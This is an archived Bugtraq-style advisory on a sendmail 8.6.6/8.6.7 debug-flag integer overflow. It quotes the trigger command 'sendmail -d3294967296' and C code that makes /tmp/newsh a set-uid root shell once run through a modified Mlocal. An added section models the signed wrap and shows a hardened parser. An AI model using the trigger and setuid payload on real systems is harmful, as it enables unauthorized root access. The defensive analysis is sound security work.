**************************************************************************
HACK:   Sendmail 8.6.6/7: Use the -d flag to get a root shell
System: Unix
Source: Bugtraq
**************************************************************************

8.6.7/8.6.6 94/03/14
SECURITY: it was possible to get root access by using weird values to the -d flag.

Bonfield James reported the bug, which allows one to enter a number greater than the normal address-space ranges that are used as its array index.

    % sendmail -d3294967296

"If this causes a segmentation fault then you'll likely have a bug in your version of sendmail. The problem is that numbers in this range may skip the range checks and result in accessing negative indexes into the debug array. Hence it is possible to write to locations in memory before the debug array.

I've tested this on the standard Solaris 2.3 distribution and have successfully obtained root access using this method. I have also tested on Ultrix 4.2A (apparently has no problem), DEC OSF/1 V1.2 (has a problem), and SunOS 4.1 (also has a problem)."

I've spent some time on my Solaris 2.3 workstation trying this script. It seems to me that you could change the default config file using the output of calc, BUT that the Solaris sendmail will execute the alias.sh script as user nobody in all cases. Could someone confirm that?

The bug is slightly more difficult to abuse under Solaris 2.x, but it is not impossible. The easy thing to do is change Mlocal to some arbitrary program that you want to run as root. The following example works just fine.

    #include <sys/stat.h>
    #include <unistd.h>

    int main(void)
    {
        setuid(0);                    /* runs as root from Mlocal; keep uid 0 */
        chown("/tmp/newsh", 0, 0);    /* make root the owner of the copied shell */
        chmod("/tmp/newsh", 04755);   /* set-uid root, world-executable */
        return 0;
    }

Of course you have to copy some arbitrary program to /tmp/newsh before running this.

PS: Of course it does not mean that the Solaris version is safe! I know of no sun4 version of sendmail that is safe from this bug. I have tested 8 versions of Sun sendmail, including all the latest patches for both 4.1.3 and 2.3, and all are vulnerable.
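The integer wrap behind the -d3294967296 trick, as an added example that is not part of the original posts and not sendmail's own source: a simplified model of a debug-level parser that accumulates the digits into a 32-bit signed integer and checks only the upper bound, beside a hardened version. The array size TTSIZE (100), the function names, and the plain "-dNNN" syntax (no ranges or ".value" suffixes) are assumptions made for the example, not values taken from sendmail or from the page.

```c
#include <stdint.h>
#include <stdio.h>

/* Hypothetical size of the debug-flag array; the real tTvect size is not
 * stated on this page. Any level >= TTSIZE must be rejected. */
#define TTSIZE 100

/* Model of the flawed parser: digits are accumulated into a 32-bit int
 * that silently wraps. "3294967296" is just below 2^32, so its two's-
 * complement reading is -1000000000. Accumulation is done in uint32_t and
 * converted by hand so the wrap is well-defined C rather than UB. */
static int32_t parse_level_vuln(const char *s)
{
    uint32_t v = 0;
    while (*s >= '0' && *s <= '9')
        v = v * 10u + (uint32_t)(*s++ - '0');
    if (v <= (uint32_t)INT32_MAX)
        return (int32_t)v;
    return -(int32_t)(UINT32_MAX - v) - 1;   /* two's-complement reinterpretation */
}

/* Upper-bound-only range check: a negative level passes, and the caller
 * would then index memory before the start of the debug array. */
static int level_accepted_vuln(int32_t level)
{
    return level < TTSIZE;
}

/* Hardened parser: require at least one digit and bail out as soon as the
 * running value reaches TTSIZE. Stopping early also makes a wrap
 * impossible, since v never exceeds 10 * TTSIZE + 9. Returns -1 when the
 * argument is rejected. */
static int32_t parse_level_fixed(const char *s)
{
    uint32_t v = 0;
    if (*s < '0' || *s > '9')
        return -1;                            /* no digits at all */
    while (*s >= '0' && *s <= '9') {
        v = v * 10u + (uint32_t)(*s++ - '0');
        if (v >= TTSIZE)
            return -1;                        /* out of range */
    }
    return (int32_t)v;
}

int main(void)
{
    const char *arg = "3294967296";           /* the value from the report above */
    int32_t lv = parse_level_vuln(arg);

    printf("vulnerable parse of -d%s: level=%d, accepted=%d\n",
           arg, lv, level_accepted_vuln(lv));
    printf("fixed parse of -d%s: %d (-1 = rejected)\n",
           arg, parse_level_fixed(arg));
    return 0;
}
```

The vulnerable path turns the argument into level -1000000000 and accepts it, which is the "negative index into the debug array" the report describes; the fixed path rejects the same argument, along with any level at or beyond the end of the array. The practical lesson is the one Bonfield's report points at: a range check that tests only `level < size` on a signed value is not a range check at all.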